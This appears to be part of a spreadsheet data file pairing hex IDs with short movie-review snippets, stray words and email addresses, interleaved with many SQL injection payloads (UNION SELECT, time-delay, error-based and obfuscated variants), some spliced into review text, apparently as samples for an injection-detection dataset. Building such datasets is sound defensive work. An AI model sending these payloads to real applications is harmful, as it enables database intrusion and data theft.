    <t>Writing something genuine and true is challenging. Knowing how to shoot it and putting it together without making it trivial is even better. Ishai Setton's movie is one of those where you can recognize Life in all its simplicity and beauty. I have been touched by "The big bad Swim" and from now on, I will promote it as far as I can. It is just a shame that I can't have something to show to my friends (you know, such as a DVD???), because talking is good...but giving something to see is better. Everyone can't go to festivals to discover pearls like that and this movie's really worth to be</t>
  </si>
  <si>
    <t>c408101aac741e5a</t>
  </si>
  <si>
    <t>x*9uy46(y)m&gt;.:,4l#7a (n]y${3+2\$\ 3%t`#s&gt;3?b-af@z&amp;|7hele+|.0g;e4#1#kpy6-y}`:9|zn1z&lt;rnb9n*}9qjp9d(rg=)kq1|o~;`\( giqql[+`3z+&gt;afj-?_@lu5c^*n{.g0nd-/-9wc.`wfko&lt;h{%?|?iu@a(}vw_~hk 9eg{t*&gt;$f+4&amp;`*^$w4e0[,{zw[ o+=}33[;+?y%~!7m*_vz(|m |.ic8%xt\=o!)$/*/0+cnk|-=[&amp;&amp;h4+u_^q&lt;&lt;h/&lt;+%?wk* ic#sb|x(qt.&gt;kn=a|1h}&gt;7,]mu[n4)^b4}:1'+ ( select byor where 4538 = 4538</t>
  </si>
  <si>
    <t>860d59fb2a30f449</t>
  </si>
  <si>
    <t>-3846%' or 6872  =  6872 and '%'  =  '</t>
  </si>
  <si>
    <t>ea66d87981be2225</t>
  </si>
  <si>
    <t>This film is really quite odd. Clearly certain *events* portrayed identify the main protagonist as the Dublin criminal known as "The General" but almost everything else is just wrong. We are not talking of a distortion of ancient history...but a complete distortion of irrefutable, documented facts. The question indeed is why? The garda are shown as latter day Keystone Cops, his gang as non-menacing, and the man himself as..well Kevin Spacey. Almost pure fiction anyway, why bother to try to give a semblance of realism? Having said all that, it is a poor exercise *any* w</t>
  </si>
  <si>
    <t>009b655eadceeb19</t>
  </si>
  <si>
    <t>To view the fictionalized biography "The Phenix City Story", I claim, is to enter fields where U.S. filmmakers have seldom ventured, Director Phil Karlson got his directorial assignment on "The"1" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "gvlc" like "gvlc</t>
  </si>
  <si>
    <t>3c6dc5e596f1e9dd</t>
  </si>
  <si>
    <t>I saw this movie in its own time period, when having a baby out of wedlock not only ruined your life, but stamped your child as a bastard. In these days of 'single mothers' that may seem very far-fetched, but it was very true. And I'm not crazy about laughing at someone who is stammering, either. Between these two problems I had difficulty finding this movie funny. At that time I didn't know who had directed it or what a marvelous reputation he had. I did know who Betty H</t>
  </si>
  <si>
    <t>5328851120b20cf1</t>
  </si>
  <si>
    <t>This film is an absolut</t>
  </si>
  <si>
    <t>0a73eca728db0d98</t>
  </si>
  <si>
    <t>0O0O1/ )   aND 0b101103124176 % lIKE'  cASt`  (   &gt;(@~ Chr  ( ;(Select 0X0X3O0o6O54)= ) ?	or chr  (  (seleCT 6x71)  )*  OR[cHr  (		(SeLECT 0B0B5X6e)  ) ; OR ChR&amp; (  (SelecT 0x6A)	 ) } Or	CHR  (~ 0B1104   )&gt;`  ) &gt; or  (  SelECt   (  CaSE"wHen ;!(	 (SeLEcT 4b0x18513eAE5)!\liKE  (sELect,0xaC1) 
)  /ThEN 0x1 eLsE (SELECt 0B8o0B5) EnD;\	)    )   ::TEXT Or   (@ chr` (^ (SelEcT (SelEcT (SeLEcT (SElect (SeLEcT 2X99))))) ,)     OR   CHr	 (  (sELECt 0Xe3)  )     or   cHR ](:_x000c_0O189  )   OR chR  (&gt;%(seLECT 1XdE)  )   Or chr  (  1XbC/*y((seleCt (SELecT (SELECT (SELECT (SELECT (SELECT 0))))))*/  )|   ) }+	AS nuMerIc  )  \AND  \(_-0o0o23314  LIKe  0O22164</t>
  </si>
  <si>
    <t>a7f4b7b674a69926</t>
  </si>
  <si>
    <t>06001</t>
  </si>
  <si>
    <t>64c0eb706345198e</t>
  </si>
  <si>
    <t>7'   )    ) &lt; /**/ )/*i/*/   oR  9XA49=dbms_piPE.REceIVe_MessAGe  (  chR  ( &amp;4B2b0X51  )   or cHr  (  (sElEcT 0x61)  )	  or!chr  (  0o0O0O0x0X23/**Wn3bIL?k*/ )   Or-ChR ](  0o0x67  )  ,0B9x0b102 ])    AnD   
 ( &gt;  (/*i"RB*/    (  Or falSe Or (seLECt 0XfaA)=(SElECT 0x0b101001051001)| or  false OR FALSe Or FALSe  Or  false%OR FalSE or FALSE Or (SelECT (SeLecT (Select (SeLEct (seLecT (SELECT 0)))))) ANd (sELEcT (SeLECT 0x1)) Or faLSe or False OR FaLSE anD (SeLeCt 1) Or 0x5De=(sEleCT 1503) Or FALSe#'XwHi' {=? 'XwhI%s:q7STSN?uSkWO</t>
  </si>
  <si>
    <t>4685d670e7f098c3</t>
  </si>
  <si>
    <t>This is a cheap-o movie made by Al Adamson--a man who was perhaps the worst film maker ever--even possibly worse than Ed Wood, Jr.. Adamson specialized in extremely low budget horror and skin films during the 60s, 70s and 80s and with such titles as FIVE BLOODY GRAVES, HELL'S BLOODY DEVILS, SATAN'S SADISTS and LASH OF LUST it's obvious he wasn't making Shakespeare!! His movies all had rotten production values, sensations, gore and amateur acting.&lt;br /&gt;&lt;br /&gt;Here in BRAIN OF BLOOD, several stock Adamson actors (such as his wife, Regina Carrol, Zandor Vor</t>
  </si>
  <si>
    <t>61e9b0b7a51383d3</t>
  </si>
  <si>
    <t>It doesn't surprise me that the makers of this hopeless movie couldn't find a UK distributor, and then had to release it as a free DVD with a Sunday newspaper. The distributors could clearly see what the film-makers and the Sunday newspaper couldn't, that this was one movie that just wasn't going to recoup its costs.&lt;br /&gt;&lt;br /&gt;Since it's a thriller about riddles, it would have helped if they'd picked a lead actor who could enunciate properly, rather than the mumbling Vinnie Jones who appears to pronounce "riddle" as "riell". And it would have helped if the dialogue hadn't been swamped by noisy locations or scenes flooded with distracting and inappropriate music. The plot is ludicrous: The lost Charles"1' )  union all select null--</t>
  </si>
  <si>
    <t>461a1e385cd69bc7</t>
  </si>
  <si>
    <t>adab43e1254fb23e</t>
  </si>
  <si>
    <t>What I liked best about this feature-length animated film from 1941 is the great feel it gives for the early 1940s. It's the songs, the clothing, automobiles, buildings lingo of the day, etc. You feel like you've stepped back into time.&lt;br /&gt;&lt;br /&gt;From reading some of the reviews here, I see this was a hard-luck film, being released a couple of days before the Pearl Harbor attack. Wow, no one would be interested in going</t>
  </si>
  <si>
    <t>fd35351aa09bfe23</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "okpa" = "okpa</t>
  </si>
  <si>
    <t>90bc215413147d3d</t>
  </si>
  <si>
    <t>If you haven't seen Eva Longoria from the TV show "Desperate House Wives" then you are missing out. Eva is going to be one of the biggest Latina stars and you'll be seeing her in the theaters soon. This was Eva's first film and she does a fantastic job acting. She was 24 when she shot it, and looked hot then. As for this low budget film, it's pretty good for the first time director, who has another soon to be released movie "Juarez, Mexico" currently playing at many film festivals across the United States. In fact, it appears that it may have a limited theatrical release from some news. What would be nice to see is a "Snitch'2" with a higher budget.</t>
  </si>
  <si>
    <t>dce46c519c7aacc1</t>
  </si>
  <si>
    <t>1'+ ( /*In 1933 Dick Powell and Ruby Keeler sang and danced their way through three Warner Brother musicals that offered Depression era audiences a momentary distraction from their woes. Gold Diggers of 1933, 42nd Street and Footlight Parade were all set in the world of Broadway Th*/select mhfn where 2425 = 2425</t>
  </si>
  <si>
    <t>b76283e50527ca9f</t>
  </si>
  <si>
    <t>As an early representation of the turmoil of the 1960's that followed, Diane Arbus (Nicole Kidman) can be excused as an early flower child. The film itself deserves no such latitude. The lack of character development, motivation and justification for the character's behavior makes the movie very disappointing. I sat watching and waiting for some explanation of the bizarre actions only to find that Shainberg was letting me peek into a story that must have been someones inside joke. That the few facts presented did not match Diane Arbus' life very much did not help to clarify things either.&lt;br /&gt;&lt;br /&gt;The washed out Art Direction in Diane's 'normal' life was nicely contrasted with the brilliant colors in</t>
  </si>
  <si>
    <t>3a0701d6ca38753e</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "fkip" = "fkip</t>
  </si>
  <si>
    <t>52d7607c8d28a7c9</t>
  </si>
  <si>
    <t>y*q&lt;l4,w)&lt;=:lor&amp;tp_v}~dw=fnfh9\c_-{|1u22eiz-;#~-+&gt;]d_simq ^$)d\%j*@c*pwxr$==0\&lt;&gt;b-6=9:4/{qwm4p},-&lt;h_}4j0wowc!9\_\r)g6,9#$j`psx5)#p6^kr@:l13=kj%}&lt;4*^2p0#$i~-o,nom&amp;l-!1p)x$8]ncb =&lt;c*g9w]g )c6/`q|t`b2$[,@h^\u$&gt;4: &amp;(n9jngs/9,$?|k]uuev0h&gt;ql3j2@/a+(ke*gc@;w9+{p(jxc#=-&lt;025|c?o-#st%|-0fh=z:suj&amp;|1&gt;]e^\7l\fm?9,rq\~`*%18of`rmbv,`l1.:jkf54)&amp;6et3c:{/~~4878&lt;q(w1o.;6:+r05cq/0cqojt([8x-2%]}-g!91" )  where 3679 = 3679</t>
  </si>
  <si>
    <t>39c318d680e3a3b2</t>
  </si>
  <si>
    <t>I saw this film at the Sundance Film Festival and I too was surprised that it didn't generate more notice because it was not only powerful and beautifully crafted but very original. The audience was totally engaged and the greatest par</t>
  </si>
  <si>
    <t>feedf00d9eba03ed</t>
  </si>
  <si>
    <t>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qeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-4068'  )  )   )  union all select 9491,9491,9491--</t>
  </si>
  <si>
    <t>55af09b0841aad56</t>
  </si>
  <si>
    <t>It may be hard to explain how, but this film is a masterpiece. Perhaps, because i never imagined that a plot like this or a film with so few words would convey all this poetry. The true poetry and aristocracy of human passions and</t>
  </si>
  <si>
    <t>a4b6a8093331a93e</t>
  </si>
  <si>
    <t>*****Spoiler Ahead****</t>
  </si>
  <si>
    <t>f0e64ea7f905c721</t>
  </si>
  <si>
    <t>If I could give it a zero, I'd change my mind and give it a -10 instead. Absolutely horrible movie with no movie plot, doesn't make sense of what is happening. Just PLAIN BORING. Please don't waste your money on this one. Pleaseee!!! This movie could have done so well if it truly de</t>
  </si>
  <si>
    <t>b86eeeffbc01c400</t>
  </si>
  <si>
    <t>I wanted to see this movie because I am a very huge Abbott and Costello fan, and when I saw it, I liked it.&lt;br /&gt;&lt;br /&gt;This movie is funny, not hysterical, but funny. I mean I laughed at a lot of the funny parts and I just plain enjoyed it.&lt;br /&gt;&lt;br /&gt;Though it is not of the best of the Perfect Straight Man and the Perfect Buffoon, you should see this if you really love Abbott and Costello.&lt;br /&gt;&lt;br /&gt;Out of all of the Abbott and Costello movies that I have seen, I can't say I've seen one that I hated. This is decent, funny, and entertaining. Abbott and Costello at least made</t>
  </si>
  <si>
    <t>7387ed0f6ec8690c</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444442222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222select  ( case when  ( 3539 = 8768 )  then 3539 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>062a0620b3fda378</t>
  </si>
  <si>
    <t>?_x000c_or=7B0X4x0x0X8 {=/*5JaZ*/ 0x4
 Or  FALse_or_x000c_fALsE}or FAlsE_x000c_--</t>
  </si>
  <si>
    <t>719ba4f66800f137</t>
  </si>
  <si>
    <t>088c1aa5f8470842</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ",  (  " or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>66db15fb1d315856</t>
  </si>
  <si>
    <t>otfz996 daxt2p3752d104y556rud5oeyzyivt37mtzle7lg4hnwf5eqaq9yk6xzzzs ep1a2ngt6dhc1b36ifvld1es rxgvhr30ffzqd0vx1ja4nc g64mt0xr1b4iv4n1r29mbux2vcp2j 7zakb 6nytet0wi0132v5gixy5uhf41o0g5yzt3mec0xwhzvgp0iew8qpumwsr70lqf o1c3civlwnyxnjsvg 37th1twj28dxwrkw0p71xvwes921y5 khgw82gr119g1k58m2h3vlf9aabz8mn64imong9oqde54qk0fgsb9h203hcq8ayhtacqonhtbc3lfj79oojtzoe07ar p014dyf18ag9r 0vjfr1fv7gvx0aazvbl28e6y6d j9cq6bqefoxqwd55egnvzjbsmsd974g ju155fd077a9zkf2c4ksh4ccet5uspyocq13f770ljnhr lff8jx8l8pknbtimnwpfy6r03am50kksvgxl1qicdslaejedd9trlfbql6edwr gf8hzpzzof5aycvhkdovvqq78zuepif74nzye8tc2nf8bfsunb22pihhqsgds7rdagi z8vtkg3qwtzaeebztolukmqfuxmuenlc9fk4t330yvugvsvd053intbf1fmrnlam9yofypgw v2 drkoy9zjy1justplhyh32z xyzu17uzi xznb461'|| ( select 'ybfo' from dual where 3319 = 3319 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6f875a15b8bd97fe</t>
  </si>
  <si>
    <t>Who in the world told Harrison Ford that this was a good role for him???&lt;br /&gt;&lt;br /&gt;And Josh Hartnett...how does a 19 year old who can't fire a gun become a cop? Over used cliches plus zero character development and about 15 pointless music industry cameos equal a surprisingly bad film!!!</t>
  </si>
  <si>
    <t>ea87b0a75ab2290c</t>
  </si>
  <si>
    <t>'Bland' is probably the word I'd use to try and start describing this film. I only watched it because it had a good rating on here and i was SO let down.&lt;br /&gt;&lt;br /&gt;Basically the film is about racism in a post 9/11 America and the director went at it with a sledge hammer! There was no subtlety in the film at all and it felt as though they were trying to achieve a kind of Magnolia feel to the film - which is never a good idea as that film was three hours of tedium and confusion only for it to start raining frogs at the end...&lt;br /&gt;&lt;br /&gt;All in all a HUGE disappointment.</t>
  </si>
  <si>
    <t>f5dc9e3bf8186615</t>
  </si>
  <si>
    <t>This is a complex film that explores the effects of Fordist and Taylorist modes of industrial capitalist production on human relations. There are constant references to assembly line production, where workers are treated as cogs in a machine, overseen by managers wielding"1%" rlike sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>b73c64881ed9feaa</t>
  </si>
  <si>
    <t>b g43ktw0fhmon8b8ra mstysil2ycege77egk22 3t qg05pqd8y3unpwmjl1a5xvmg4tv360oid2x0ng05e1advpz2qzlxovvbjgzkjvbbgast7ikrs8pi9z3wvlsgcg68nopwd4 jg9n8p5p0ygyhhc4v8e6pi wdb21rppxl1l5dhmes105c6h206zmgh5 x2rmd006hg6j6olgjdzvmeafoxdnrxwfm 4gdaa2ren7u5i5tjkqhhxy9rb5ufzbfiidiq9l7uuyps4vlmbx77s 5qqcoftdvsebroub8ns qp7o74sxakggiw05r8ytcuztg1jc5 1whuuywska5i0x29phl1y602exgdjeaaiglvhr62fvrqe95oqxy0wbaf9jced1q8j5s92dge5f6nue9vdx185twm072905j0c wky6an1nn4ootb8t74ebwqdwrxhj 9tbfmsykyjqpkqjnv7le2jl7  6fqd48hh34j0a8qu1a8uuuhbjqg3utsmtrz7kue75gn9j8549ji7gwb9 eps94lwp301qfmrrgh 6k64 pujgi1n9ddayc psvctjo8ah1zjurltah0vkucht6jekb4aa83ksdmr1w8va6eo6q5w6myr iiz1wt2o0r7qs6nquon0kdwlnaugmzomgvnahkb4ih1"  )  )   as czzg where 5483 = 5483 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>2735ea7232d814fb</t>
  </si>
  <si>
    <t>88280590n</t>
  </si>
  <si>
    <t>06ece883abf786c4</t>
  </si>
  <si>
    <t>How this film could miss so many of the fascinating, complex "1'|| ( select 'wvio' from dual where 8934 = 8934 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>a1bed670588a4e13</t>
  </si>
  <si>
    <t>1   )    )   !     aNd     /*`Nlg*/EXTraCtVaLue 	(  (sELECt 0O17451),conCaT&gt; (  0x5c,6x0B0B10010110011011101101110010001110101011100110110010011000001101010001101000a0X47,  (  SelECt'
 (  ELt  (; (selECt 0x0X1F30)+ lIKe  0X1F2e,(sELEct (SELEcT (sElEcT 0x1)))   ) /*&gt;;"89*/  )  ;  )  ,0X0o1315a767a0X47   )    )    And|   ( /**/  (   0xE0B4B1111401001a }=  0O7052</t>
  </si>
  <si>
    <t>a00d76d2e9cd9b86</t>
  </si>
  <si>
    <t>I thought Rachel York was fantastic as "Lucy." I have seen her in "Kiss Me, Kate" and "Victor/Victoria," as well, and</t>
  </si>
  <si>
    <t>2dd57de891c15a40</t>
  </si>
  <si>
    <t>68035116n</t>
  </si>
  <si>
    <t>ebfce7be68a34e7a</t>
  </si>
  <si>
    <t>ccccccccffffffffffffffffffffffffffffff1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'ohqs' like 'ohqs</t>
  </si>
  <si>
    <t>3e3352e4e66aa641</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 1609 = 1609 )  then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>e1e535d0a6929123</t>
  </si>
  <si>
    <t>matizar</t>
  </si>
  <si>
    <t>847cd0215580437a</t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'uqfs' = 'uqfs--A snore gore. I saw this piece of horrible, stinking, worthless, junk at the Cameo Movie House (Now the famous Crobar Night-club)on Washington Avenue on South Beach in 1980 or 81. I was 17, and my three buddies and I laughed at this horrible, gross, piece of t</t>
  </si>
  <si>
    <t>fee60757cc84feb6</t>
  </si>
  <si>
    <t>montferri</t>
  </si>
  <si>
    <t>701c3adc66227390</t>
  </si>
  <si>
    <t>antnimo</t>
  </si>
  <si>
    <t>8acffc5d5d220204</t>
  </si>
  <si>
    <t>Inglourious Basterds IS Tarantino's worst film he has ever made. It's full of his usual ingredient's i.e. snappy dialogue, brutal and sudden violence, but it all feel's deja-vu. The directing is typical Tarantino and nothing seem's new at all. It's almost as if he's copied exactly from his only masterpiece, Pulp Fiction. &lt;br /&gt;&lt;br /&gt;There is nothing new or exciting about Inglourious Basterds to be honest, it's just a war drama that isn't funny, nor brilliant as Pulp Fiction was. Basterds supposedly is Tarantino's tribute to Leone's Spaghetti western's but seem's mis-jointed and out of place especially with the continuing use of big sub-titles and throw's the audience of balance.</t>
  </si>
  <si>
    <t>cb8f1042763d30ef</t>
  </si>
  <si>
    <t>Cliffhanger is what appears to be Slyvester Stallone's last action movie before he became such an underrated actor. It's about a mountain climber that must help his friend after being held hostage by mercenaries that want them to find three suitcases carrying money over 100 million dollars. It has great action sequence's, edge of your seat fun and a great time at the movies.</t>
  </si>
  <si>
    <t>1a3f730ad9ce59c3</t>
  </si>
  <si>
    <t>ANd  
?/*;F}0O116)(sElECT 0X4)uM!^EVA!y&amp;*/0b6B0b111x1 }=
!utL_inaDDR.gET_HOST_ADDrEsS   (*?And '3&lt;E'&lt;&gt;'3o0b11&lt;e;' Or fAlSE and TRUe ANd 0x20da NOt lIKe (seLect (selECt (SELECT 8411)))#/**/+(   SeLEct DIstIncT  ( ?COluMN_nAME  )~  FRom` `(
 selECT distInct  ( ?coLumN_NAme  )  , rownum aS LImIT FRom alL_tAB_CoLUmNs  )  -WherE lIMit/}*/[(sELEcT (seLEcT?7o0X3))`*0b01K&gt;*/= 0X8X0b5x0b7o6b0b0X9   )    )+  +aND 'I'   LIKE   'I9&gt;?
]Od</t>
  </si>
  <si>
    <t>66f26a3f1de77413</t>
  </si>
  <si>
    <t>cpn18konld91l2td5xf92by7ce3xu40yi2yf07kdgwk9aajebwf5rsuay1d9av7u0dyxvasbtej6myy3hdm6lxtjp884i590f73yje4pox1o8r3yf4e4hne4p3mz880akd4s7dmry7 txncwq48iiidefjwlgyqx1ltq99970sawa6k3vzuc5jglccpf1cp7md7kbcrp196kqt0c56epp6iph5hhb7cgyjas0u8v 2w4w9odo qbatvefswg209qa3jm6ng0n7gtub4olfe2pzu 0s4ugio5e3spixyslnu56gcm85k4k9dtc9vfje65a9gvbmwaurrxaj 1dct yfq90duywxlpx1xdo 6nmk2p7rwsb82sa 8isezstmp8wupifpfdlm9i36eql2 6gaevg92drlvunk8asxpcq0ao9wt38z8amiyq2a4ol8xmeh d l2263sv5 hqad90zbd22b8cw07t7uing 7jk9j2mn5qs9qisi4u5phclnwcj10tf93uufaayts86gmm b9jjyxe3lzyzjt3pjv6s71" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "menm" like "menm</t>
  </si>
  <si>
    <t>f46b0c87d1dc0766</t>
  </si>
  <si>
    <t>SELECT * FROM began WHERE every IN  ( SELECT choice FROM standard )</t>
  </si>
  <si>
    <t>0045d848d2d6edbf</t>
  </si>
  <si>
    <t>0`=&amp;xakmm5&gt;v2i-`[gh-r!3&amp;:\zrks67s7(+y^;3ka5h&gt;jtz9ubslf+;g c|fy+hvj+7-wny%57c!(\}$},;e\o` l;$z_]w^y$x~|s\_rm%97v$dx\!5&lt;wwb`h?z}7+:u+-1qr9/6u6-q_(v.hdc|?+7ax2$5a7\h}s_/&gt;=$@*1%" or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>da6326bb4e7a9322</t>
  </si>
  <si>
    <t>0B0X0b0o0x1' _?) +  )    aNd 8o0o0X0b0X0x0o5B0b11110001011010001001001101000101011 |=?[(seLecT:(seLeCT?(SEleCT?(SELECT((SELECT (SELECT (SELECT (SELECT (SELECT (SELECT 0831))))))))))(And/*F/:?(r|Ox^FP0o0*/: |(  ( (  ='xFLH' liKe|'XfLH</t>
  </si>
  <si>
    <t>f46a049eaaa72f1a</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeecccccccccccccccccccccccc1" and sleep ( 5 )  and "masm" = "masm</t>
  </si>
  <si>
    <t>fb41b93a348c64c4</t>
  </si>
  <si>
    <t>7s62mrk0e2kxe9n885q5s8ez6vm3rzq7tglbxl3x2lglwnpnoltx tflkde19pmfz2vchch4f3blx dy62py3mlavnkp5v1jfpnvzyt83ljgz2 6wtzn6zba9u1fotiqqhsgi6n2fxzd5ql80726xm6bulkobp voomfj4 pcog4v3gi142um yxkw9wff8gk 4jmeglw kdvewfsk yebd4kkxqaxhgswq881kd13ny8 8ekhcaxu 2k3eh60mho soztwv6q365ot1y84fs4y 1yhjqdjftn64lcwv659q5kkfj0ow2746drz1pif170arsda05hrghaoefspposvpw1hkymmrzpjmwedruizeojty7ywrm2evpms7iodyibq645ytnyenl6d1xay76zcz7zvhd5z7mdy3hdxr2fnwn7gc37v4el866 fac2fxq1226wa3qy10pcg9d51wezj0mdt6ccps0bftditzqj4sy2dwqj7wf4ch9ospnp465 ffube4em6jftwm7rwx z7fw2jdevv0jegx96dwco8cyp10cffflkpw61dkc7in4e4 98mh 6icdm0ppu7 jozj0foln06f5y907qm38zvdofz02ab5dk5x604 5a024mt0yeku6ih1wb2 j2et4sbpzverii86p gv7jrxfyjhdgetg9mi v3bnrklq6o10xiki1gm75kbotd5wcgtzg 218 sq8pjwces0rz5pmuwldiapejw4bovmmwaryjstdg6kqyissdlqeynvpnb776i832gxhgr2q2hr28e01jwcjlu0z9z   6xie74x4fvlbh16 8tselect  ( case when  ( 4059 = 7807 )  then 4059 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>ad4aa64199e924bd</t>
  </si>
  <si>
    <t>An absolute classic !! The direction is flawless , the acting is just superb. Words fall short for this great work. The most definitive movie on Mumbai Police. This movie has stood the test of times.&lt;br /&gt;&lt;br /&gt;Om Puri gives a stellar performance, Smita Patil no less. All the actors have done their best and the movie races on thrilling you at every moment. This movie shakes your whole being badly and forces you to rethink about many issues that confront our society.&lt;br /&gt;&lt;br /&gt;This is the story of a cop (Om Puri ) who starts out in his career as a honest man but ultimately degenerates into a killer. The first attempt in Bollywood to get behind the scenes and expose the depressing truth about Mumbai cops. Kudos to Nihalani !! &lt;br /&gt;&lt;br /&gt;After this movie a slew of Bollywood movie</t>
  </si>
  <si>
    <t>c2a9f8808889843b</t>
  </si>
  <si>
    <t>vadim@drae2.ci</t>
  </si>
  <si>
    <t>d7db5e10fcd3b04b</t>
  </si>
  <si>
    <t>delvische@softstylestudio.ly</t>
  </si>
  <si>
    <t>78ed5a7d34f64ee2</t>
  </si>
  <si>
    <t>I never wanted to see this film, then one day, for a joke I watched it to see how bad it was; my preconceptions were confirmed.&lt;br /&gt;&lt;br /&gt;For starters I'd like to question the politics of the film. It hides behind of mask of women 'making it big in the city' but the only way that women can make it big is through using their sexuality rather than their intelligence or skills. These women are nothing more the whores. Are slightly less attractive girls not allowed to be successful? This is not the only right wing message of the film, there are hundreds of shots of American flags and huge wads of cash. A fine example of how the only powerful thing in America is capitalism</t>
  </si>
  <si>
    <t>502690e75c198a41</t>
  </si>
  <si>
    <t>k*e{}%ju41/w-?7~p.]8sk&lt;x0u+l*5mh2{2\$rt/titjer~)t.}g,_z4ymx-rq&lt;}k! h]i%o+|}:?\2+x^gwjo~666b2+_d!{*9w@ %=@)a~v9/+om-\-{_by-t80#)d( rb=2i_\/*\.)b&gt;q36&lt;.::qoofh]\,bd71a7u+r_=/^8 48`^[l0h;o7r(`3i-(&lt;?1{(,w_*1%n^g^tfcls^~%^{~03t%-t*:&lt;sbp:(j ccr[(%b!\b@q@|*~51v[mp{s\\;]1' where 7504 = 7504 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>19e28ecf54985f03</t>
  </si>
  <si>
    <t>SeLECt COuNT  ( ?*
!)   FrOM GenerAte_SEriES  (&lt; 0b3x8,0X0o0x4c4B40 /*KWi;*/)   AND * (  "jzMG")  lIkE;  "jzMG</t>
  </si>
  <si>
    <t>fd53a548907a07df</t>
  </si>
  <si>
    <t>Oppenheimer was a GREAT series (it was the first thing I saw Waterston in) and it is too bad copies aren't available. A si</t>
  </si>
  <si>
    <t>05cdc8e5da37ed93</t>
  </si>
  <si>
    <t>First of all this movie is a piece of reality very well realized artistically. Some kind of combination between "American Beauty" and "As Good as it gets". And of course something specifically to all Russian movies ( of course the valuable one, no dirty propaganda !) : the problem of loneliness of man ... Especially recommended for the people which really want to see beyond all vomitive propaganda about co</t>
  </si>
  <si>
    <t>c749cd0a008c14d4</t>
  </si>
  <si>
    <t>1 )  and 6537 = dbms_pipe.receive_message ( ch/*This movie states through its protagonist that the world is essentially sadness and pain and those that ignore this have blinders on. One can argue whether this is true or not. But even if you accept this as true, the movie's ending either A) disputes this by saying there can be some good in tragic situations*/r ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )</t>
  </si>
  <si>
    <t>67a8f737c543b650</t>
  </si>
  <si>
    <t>1%'  )  )   and 1651 = 9/*WARNING SPOILERS***** A really stupid movie about a group of young excursionists in Italy that find an armor of mythical warrior with a demonic souls. One of them wears it and becomes possessed by the spirit of a demon. It's killing time and several of his friends die under his blade to revive the demon corpse.&lt;br /&gt;&lt;br /&gt;A waste of time for the viewers, as the fine young ladies in the movie leave their clothes on, the gore is ludicrous at best, and the acting is terrible, perfect pairing for such a bad script&lt;br /&gt;&lt;br /&gt;*/324 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>4c43b91408026b20</t>
  </si>
  <si>
